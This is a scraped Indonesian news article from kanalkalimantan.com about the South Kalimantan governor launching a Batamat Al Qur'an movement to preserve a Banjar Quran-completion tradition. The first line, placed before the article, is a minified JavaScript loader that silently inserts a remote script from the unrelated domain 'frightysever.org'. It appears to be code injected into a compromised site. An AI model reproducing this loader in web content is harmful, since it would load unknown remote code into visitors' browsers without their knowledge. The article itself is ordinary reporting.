(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,'script','https://frightysever.org/Bgkc244P');
RELIGI

Merawat Batamat Al Qur’an, Tradisi Banjar yang Diamalkan Turun Temurun


KANALKALIMANTAN.COM, BANJARMASIN – Tradisi leluhur turun temurun warisan budaya Banjar harus terus dipertahankan. Salah satunya Batamat Al Qur’an yang sudah menjadi budaya orang Banjar.

Untuk merawat dan menjaga tradisi itu, Gubernur Kalimantan Selatan H Sahbirin Noor mencanangkan Gerakan Batamat Al Qur’an di Masjid Raya Sabilal Muhtadin Banjarmasin, Sabtu (13/8/2022).

Gubernur Kalsel mengatakan, khataman atau Batamat Al Qur’an sejatinya adalah hal yang sudah menjadi kebiasaan para leluhur.

“Mulai ulun lagi halus karena banyak jua guru mengaji di Sungai Jingah. Pokoknya bila tuntung, batamat tu pang. Paling kada ada lakatan wan hintalu sebiji jadi haja. Apalagi di tempat lain di wilayah kita, karena wilayah Kalsel adalah wilayah yang religius, rakyatnya religius tentunya,” katanya.

 

Baca juga  : SN Diringkus di Desa Sepunggur, Polisi Dapati 12 Paket Sabu

Paman Birin berharap dengan adanya kegiatan Batamat Al Qur’an ini akan menjadi sebuah kebiasaan bagi semua dan anak cucu.

“Hidup kita, masyarakat kita adalah masyarakat yang religius dan punya kitab yang luar biasa yaitu Al Qur’anulkarim. Jadi tidak hanya kita sekadar membaca, tapi kita mampu mengaplikasi dan mengamalkannya dalam kehidupan sehari-hari,” ucapnya.

Ketua Badan Pengelola Masjid Raya Sabilal Muhtadin, KH Darul Qutni mengatakan, Gubernur Kalimantan Selatan menjadi peserta kehormatan dan mengawali Batamat Al Qur’an mulai dari surah Ad Dhuha.

“Kami mengapresiasi atas inisiatif bapak Gubernur. Melalui kegiatan ini kesediaan beliau untuk mencanangkan Gerakan Betamat Al Qur’an sebagai wujud mempertahankan dan melestarikan tradisi leluhur dan warisan budaya yang religius ini,” katanya.

 

Baca juga  : Kronologi Lelaki Gantung Diri di Guntung Paikat Banjarbaru, Polisi Sebut Murni Bunuh Diri

Ia menuturkan, gerakan ini memberikan dorongan kepada semua pihak dari anak, keluarga dan masyarakat agar terdorong untuk mempelajari Al Qur’an secara rutin.

“Semoga membawa pengaruh positif bagi peningkatan pelajaran Al Qur’an di masa akan datang, khususnya generasi muda,” ucapnya.

Sementara itu, Tuan Guru KH Wildan Salman menyampaikan dengan khataman semua sekarang berkumpul dalam rangka mengkhatamkan Al Qur’an untuk mendapatkan istigfarnya para malaikat dan doanya para malaikat.

“Mudah-mudahan dengan ini kita menambah semangat untuk membaca Al Qur’an dan bisa mempelajari lebih dalam dan banyak, serta diterima Allah dan kita selalu bisa membaca Al Qu’ran sampai akhir hayat,” ingat pimpinan Tahfiz dan Ilmu Al Qur’an Darussalam Martapura. (Kanalkalimantan.com/al)

Reporter : al
Editor : kk


Desy Arfianty

Recent Posts

Hidup Makin Tenang, Hadapi Risiko dengan Asuransi Pelita dari BRI Life

KANALKALIMANTAN.COM, - Asuransi merupakan salah satu bentuk perlindungan yang perlu dimiliki setiap orang. Dengan memiliki… Read More

13 jam ago

10 Mei Hari Lupus Sedunia, Yuk Kenali Penyakit Lupus

KANALKALIMANTAN.COM - Peringatan Hari Lupus Sedunia ini diadakan pada tanggal 10 Mei setiap tahunnya. Hari… Read More

13 jam ago

Teror Buaya Muara di Pelambuan, Warga Diminta Jauhi Sungai

KANALKALIMANTAN.COM, BANJARMASIN - Buaya yang kerap muncul di Sungai Pelambuan, Kecamatan Banjarmasin Barat, Kota Banjarmasin,… Read More

13 jam ago

Satgas Distribusi Material ke Lokasi TMMD Desa Sungai Karias

KANALKALIMANTAN.COM, AMUNTAI - Pelaksaanan program TNI Manunggal Membangun Desa (TMMD) ke-120 Kodim 1001/HSU-BLG di Desa… Read More

17 jam ago

Yakin ‘Pemilik’ 13 Kursi Golkar, Acil Odah Lamar Nasdem Koalisi di Pilgub Kalsel

KANALKALIMANTAN.COM, BANJARBARU - Hj Raudatul Jannah atau Acil Odah siap ramaikan kontestasi Pemilihan Kepala Daerah… Read More

20 jam ago

Musrenbang RPJPD 2025-2045, Bahas Rencana Program HSU 20 Tahun ke Depan

KANALKALIMANTAN.COM, AMUNTAI - Pemerintah Kabupaten Hulu Sungai Utara melaksanakan Musyawarah Perencanaan Pembangunan (Musrenbang) Rencana Pembangunan… Read More

20 jam ago

This website uses cookies.